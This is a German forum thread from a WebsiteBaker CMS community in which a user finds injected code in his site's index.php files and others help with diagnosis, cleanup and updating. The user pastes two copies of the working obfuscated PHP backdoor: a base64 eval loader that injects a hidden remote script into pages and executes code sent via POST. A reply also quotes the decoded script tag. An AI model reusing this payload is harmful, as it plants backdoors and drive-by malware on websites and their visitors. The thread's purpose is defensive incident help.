Ist da was faul oder alles ok?

[derschutzhund]

Hallo,

nach einer Fehlermeldung wegen Links die ich nicht eingebaut habe, habe ich mir einige Dateien näher angesehen.
Ist es normal, dass in fast allen index.php der Module folgender code eingebaut ist?

-----------------------
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V 4aXN0cygnc3hoZScpKX tmdW5jdGlvbiBzeGhlK CRzKXtpZihwcmVnX21h dGNoX2FsbCgnIzxzY3J pcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJOaGJtRmtZWFZ1YVhabGNuTnBkSGx3Y21WemN5NWpiMjB2YzJodmNIQnBibWRqWVhKMEwwTlZVRjl2Y21SbGNsOW1iM0p0TG5Cb2NDQStQQzl6WTNKcGNIUSsnKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIHN4aGUyKCRhLCRiLCRjLCRkKXtnbG9iYWwkc3hoZTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHN4aGUxKSljYWxsX3VzZXJfZnVuYygkc3hoZTEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3N4aGUnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdzeGhlJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHN4aGVsPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdzeGhlMicpKSE9J3N4aGUyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
-----------------
Doch bestimmt nicht oder?

Grüße Wolfgang
 

[doc]

Hi,

das sieht gar nicht gut aus. Da hast sich bei Dir wohl was eingenistet, was so nicht dahin gehört.
Würde mal die Servereinträge überprüfen.

Doc

[kweitzel]

Ja ... Wende Dich bitte an Deinen Hoster wenn Du da selber nicht ran kannst.

Gruß

Klaus

[derschutzhund]

Hallo,

was meinst du mit Servereinträgen?

Ist möglicherweise eine blöde Frage?

Grüße Wolfgang

Hi,

das sieht gar nicht gut aus. Da hast sich bei Dir wohl was eingenistet, was so nicht dahin gehört.
Würde mal die Servereinträge überprüfen.

Doc

[doc]

Hi,

mit "Servereinträge" habe ich die Logfiles Deines Servers gemeint, welche Dir Aufschluss darüber geben könnten, wie diese "Einträge" in die index.php Deiner Dateien gelangt sein könnte.

Auf jeden Fall würde ich den Hoster darüber informieren und zeitnah ein Backup der DB, Dateien etc. durchführen. Am besten nachdem geklärt wurde, wie diese Einträge in die Dateien gelangt sind.

Doc

[DarkViper]

Das Teil baut unter anderem folgendes Script in deine Seite ein:

<script src=http://canadauniversitypress.com/shoppingcart/CUP_order_form.php ></script>

und macht es unsichtbar, so dass der Aufruf unbemerkt im HIntergrund abläuft....
Soweit ich das Teil bisher analysiert habe, verbreitet es sich auch selbstständig innerhalb Deines Webspaces (also in alle index.* )

[derschutzhund]

Hallo,

habe nochmal alles durchsucht. Du hast Recht, das Teil ist fast in jeder index.php eingebaut und nicht nur im Bereich module.

Was kann ich denn machen, wenn mal alles gereinigt ist, sowas künftig zu vermeiden?
Ist es ok wenn die Zugriffsrecht der Dateien auf 644 gesetzt sind?

Den Provider habe ich informiert!

Grüße Wolfgang

[doc]

Hi,

wenn Du bei einem vernünftigen Provider gelandet bist, wird dieser versuchen, das Einfallstor zu finden.

In ausgepackter und lesbarem Format hat das kleine PHP Script knapp 50 Codezeilen. Wäre ich der Provider, würden mich einige dieser Code Zeilen stören

Doc

P.S.: Die Domain die im Script aufgerufen wird, ist seit gestern (2010/02/15_17:41) in der Malware Domain List als Exploit gelistet: http://www.malwaredomainlist.com/mdl.php

[DarkViper]

Dateirechte 644 / Verzeichnisse 755 sind genau richtig.

[instantflorian]

Hallo Wolfgang,

ist die betroffene Website zufällig bei Goneo gehostet?

Dann solltest Du unbedingt auch ggf. Deine anderen dort gehosteten Projekte überprüfen, da gab es vor ein paar Wochen einen Angriff. Desweiteren sind dann auch die Platzhalter unter /pages und nicht nur die index.php infiziert.

Grüße
-instantflorian.

[chio]

Und als erstes würde ich mal die komplette WB-Installation erneuern = drüberspielen. Inklusive aller Module.

[derschutzhund]

Die Seite ist bei Webhoster...

Hallo Wolfgang,

ist die betroffene Website zufällig bei Goneo gehostet?

Dann solltest Du unbedingt auch ggf. Deine anderen dort gehosteten Projekte überprüfen, da gab es vor ein paar Wochen einen Angriff. Desweiteren sind dann auch die Platzhalter unter /pages und nicht nur die index.php infiziert.

Grüße
-instantflorian.

[derschutzhund]

Aktuell ist die Version 2.7 installiert.
Diese Version ist doch grundsätzlich nicht unsicher oder?

So ein Wechsel oder ein neues Überspielen ist doch immer ein gewisses Risiko oder?

Wenn es absolut erforderlich ist WB neu aufzuspielen, ist es dann sinnvoll bei der Gelegenheit
auf die aktuelle Version 2.8.1 zu gehen?

Grüße Wolfgang

Und als erstes würde ich mal die komplette WB-Installation erneuern = drüberspielen. Inklusive aller Module.

[WebBird]

Autsch...

Verzeihung, das Autsch bezog sich auf das böse Script, nicht etwa auf den letzten Beitrag.

[doc]

Hallo,

wenn Du auf Nummer sicher gehen willst, dass alle Überreste dieses "Schädlings" beseitigt sind, wirst Du um ein Neuaufsetzen des Systems nicht herum kommen. Wenn Du das ganze eh neu aufsetzt, kannst Du das auch gleich sauber mit WB 2.8.1 tun (sinnvoll).

Doc

[derschutzhund]

Wollte auf die Schnelle alle bösen Scripte aus den versäuchten Dateien entfernen.
Mit FreeCommander kann man alle Dateien in einem Verzeichnis (inkl. Unterverzeichnisse) nach dem Inhalt durchsuchen lassen.
Ich kann also sagen, in welcher Datei die Scripte eingebaut sind.
Gibt es ein Programm um automatisch aus allen Dateien eines Verzeichnisses einen bestimmten Text löschen oder ersetzen zu lassen.
Damit würde ich dann die Dateien reinigen und eben wieder hochladen.
Eine Sache von Minuten.

Grüße Wolfgang

[procec]

Ich hatte kürzlich ein ähnliches Problem. Ursache war eine Sicherheitslücke im clickheat-Modul eines Statistikmoduls:
http://www.phpmyvisites.us/
Da dieses "clickheat" auch woanders eingesetzt wird/wurde, könnte das das Einfallstor sein.

In unserem Fall: In einem tiefen Unterverzeichnis des websitebakers fand sich schließlich ein mehr als 60 mal mit sich selbst verschlüsselte php-Datei, die sich nach einer Auspackorgie als eine komplette php-Shell herausstellte! Damit hätte der Hacker weiterhin Zugriff auf das System gehabt.

Gruß
Raimund

[derschutzhund]

Auf einer anderen HP mit ebenfalls WB 2.7 die auch bei einem anderen Provider ist !1und1)
hatte den gleichen "Trojaner"
---------------------
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V 4aXN0cygnanlnJykpe2 Z1bmN0aW9uIGp5Zygkc yl7aWYocHJlZ19tYXRj aF9hbGwoJyM8c2NyaXB 0KC4qPyk8L3NjcmlwdD 4jaXMnLCRzLCRhKSlmb 3JlYWNoKCRhWzBdYXMk dilpZihjb3VudChleHB sb2RlKCJcbiIsJHYpKT 41KXskZT1wcmVnX21hd GNoKCcjW1wnIl1bXlxz XCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyWnBlbnA1WkdWemFXZHVMbU52YlM5cGJXRm5aWE12UmtsYVdsbE1UMGRQTG5Cb2NDQStQQzl6WTNKcGNIUSsnKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGp5ZzIoJGEsJGIsJGMsJGQpe2dsb2JhbCRqeWcxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRqeWcxKSljYWxsX3VzZXJfZnVuYygkanlnMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nanlnJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnanlnJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGp5Z2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2p5ZzInKSkhPSdqeWcyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
---------------------

Es liegt also offenbar doch an WB!

Ist es denn normal, dass die config.php im Hauptverzeichnis steht und zwar dann mit allen Infos zur HP??
Da stehen doch alle Daten des Systems!

Ich habe den Eindruck, dass "include" und "modules" die Bereiche sind wo sich die Schurken einschleichen!

Mir hat der Provider der ersten HP (meine private) gesagt, dass es bei WB kein Problem wäre mit POST einzudringen!
Wenn das so wäre dann ist das natürlich nicht gut und eigentlich müsste ich dann auf ein anderes CMS übergehen!

Grüße Wolfgang

[doc]

Hi,

Mir hat der Provider der ersten HP (meine private) gesagt, dass es bei WB kein Problem wäre mit POST einzudringen!

Hat er auch zufällig die verwundbare URL mit geteilt?

Wenn ja, diese bitte per PM an einen vom Dev-Team schicken. Es gab in der Vergangenheit verschieden Module, welche für Angriffe von aussen anfällig waren. Eventuell auch mal eine Liste mit installierten Modulen ans Dev-Team schicken.

Ohne URL kanns bei schlecht konfiguriertem Server auch ein x-beliebiges anderes Script sein. Das Einfallstor ist daher immer recht wichtig. Wenn es ein vernünftiger Provider ist, sollte er dir dies ohne weiteres mitteilen können.

Doc

[Waldschwein]

Hallo!

Also grundsätzlich ist WebsiteBaker sehr sicher. Das ist nicht bloß so in die Luft geblasen von einem "Fanboy", sondern das stimmt wirklich, auch zahlreiche interne Tests und die doch sehr große Benutzerzahl bestätigen das durchwegs.

Die Frage ist: Welche Gemeinsamkeiten im Frontend haben die beiden Seiten? Wenn es zwei unterschiedliche WB Installationen sind, aber beide betroffen, muss irgendwo etwas gemeinsam sein.
Die Frage ist hier: Welche Module sind installiert auf beiden, und welche Module sind aus dem Frontend aubrufbar? Oder hast du auf beiden WB Installationen etwas eingebunden?

Dass die config.php im Hauptverzeichnis steht ist grundsätzlich bei so ziemlich allen Internetsoftwares, die auf Datenbanken zugreifen der Fall. Egal ob SMF hier, ob vBulletin, ob websitebaker. Irgendwo muss ja die Software wissen, wie sie zur Datenbank gelangt.
Hast du irgendwo (ich meine mit irgendwo wirklich alles, egal ob E-Mail, PMs über soziale Netzwerke / Foren) die Zugangsdaten weitergegeben?

Gruß Michael

[Waldschwein]

Wenn ja, diese bitte per PM an einen vom Dev-Team schicken. Es gab in der Vergangenheit verschieden Module, welche für Angriffe von aussen anfällig waren. Eventuell auch mal eine Liste mit installierten Modulen ans Dev-Team schicken.

*hust* Neue Webseite -> Footermenü "Sicherheitsfragen".
http://www.websitebaker2.org/de/community/sicherheitsfragen.php
Da steht eigentlich alles, inkl. vorgefertigter Formulare.

Gruß Michael
 

[doc]

Hi,

im "Original WB 2.7 Downloadpacket" war eine anfällige FCKEditor Version enthalten (in WB 2.8 gefixt).
Die FCKEditor Entwickler haben dieses Sicherheitsleck mit FCK Version 2.6.4.1 behoben. Das Update wurde als wichtiges Sicherheitsupdate eingestuft.

Es ist immer sinnvoll, Software (speziell übers WWW erreichbare) auf aktuellem Stand zu halten. Für WB heisst das auf die derzeit aktuelle Version WB 2.8.1 upzudaten.

Doc

P.S.: Die FCKEditor v2.6.4.1 ist ab WB FCK Modul v2.89 (vom 6. July 2009) integriert.

[derschutzhund]

Hallo Michael,

beim Aufruf dieser Seite kommt folgende Meldung:

Die Zugangsdaten habe ich nie irgendwie "veröffentlicht"!
 
Grüße Wolfgang

Wenn ja, diese bitte per PM an einen vom Dev-Team schicken. Es gab in der Vergangenheit verschieden Module, welche für Angriffe von aussen anfällig waren. Eventuell auch mal eine Liste mit installierten Modulen ans Dev-Team schicken.

*hust* Neue Webseite -> Footermenü "Sicherheitsfragen".
http://www.websitebaker2.org/de/community/sicherheitsfragen.php
Da steht eigentlich alles, inkl. vorgefertigter Formulare.

Gruß Michael
 

[derschutzhund]

Hallo,

was ein update angeht hab ich immer etwas Muffe, dass dann erst mal nichts mehr geht weil es Probleme
mit der Datenbank gibt!

In WB 2.7 gibt es zwar die Möglichkeit die Datenbank zu exportieren aber nicht sie bei Problemen wieder zu importieren!

Verwendet man die Backupmöglichkeit der Provider, dann sind da ungefähr "150" Einstellungsmöglichkeiten. Exportieren geht immer aber ob es dann überhaupt was gebracht hat, sieht man wenn der Import nicht funktioniert!

Dann hat man zwar ein neues System aber was den Inhalt angeht fängt man von vorne an und das ist ein großes Risiko oder?

Grüße Wolfgang

Hi,

im "Original WB 2.7 Downloadpacket" war eine anfällige FCKEditor Version enthalten (in WB 2.8 gefixt).
Die FCKEditor Entwickler haben dieses Sicherheitsleck mit FCK Version 2.6.4.1 behoben. Das Update wurde als wichtiges Sicherheitsupdate eingestuft.

Es ist immer sinnvoll, Software (speziell übers WWW erreichbare) auf aktuellem Stand zu halten. Für WB heisst das auf die derzeit aktuelle Version WB 2.8.1 upzudaten.

Doc

P.S.: Die FCKEditor v2.6.4.1 ist ab WB FCK Modul v2.89 (vom 6. July 2009) integriert.

[doc]

Hi,

was ein update angeht hab ich immer etwas Muffe, dass dann erst mal nichts mehr geht weil es Probleme
mit der Datenbank gibt!

Naja, ich hätte mehr Muffe vor veralteter Software mit bekannten Bugs.

Verwendet man die Backupmöglichkeit der Provider, dann sind da ungefähr "150" Einstellungsmöglichkeiten. Exportieren geht immer aber ob es dann überhaupt was gebracht hat, sieht man wenn der Import nicht funktioniert!

Man kann auch erst mal ein paar "Trockenübungen" unternehmen (ohne Risiko).

a) ALLE Dateien und Ordner der WB 2.7 Seite im Netz per FTP auf den lokalen Rechner kopieren
b) mit phpMySQL ein Datenbank Dump erstellen (alle Tabellen als Textdatei), oder den Dump des Providers nutzen
c) eine lokale Entwicklungsumgebun g aufsetzen (XAMPP ist in 15 Minuten installiert)
d) die runtergeladenen WB 2.7 Dateien ins XAMPP htdocs Verzeichnis kopieren (z.B. C:\XAMPP\htdocs\wb)
e) phpMyAdmin von XAMPP aufrufen (URL: http://localhost)
f) die Datenbank Sicherung (phpMyAdmin oder vom Provider) zurückkopieren
g) die lokale WB config.php Datei (C:\XAMPP\htdocs\wb\config.php) anpassen --> DB Zugang (localhost, root ...) und URLs http://localhost/wb

Fertig ist die lokale Kopie mit der Du nun experimentieren kannst. Idealerweise kopierst Du nochmal alle lokalen Dateien (C:\XAMPP\htdocs\wb --> C:\XAMPP\htdocs\wb_backup). Nun kannst Du LOKAL auf WB 2.8.1 updaten. Geht was schief, kannst Du jederzeit LOKAL wieder auf WB 2.7 zurück.

Wenn LOKAL genug geübt, dann Update im Netz durchführen. Geht dann was schief, hast Du zur Not noch die komplette LOKALE Sicherung zur Hand. So ist nichts gewonnen, nichts verloren und Du sammelst Übung im Umgang mit Updates.

Doc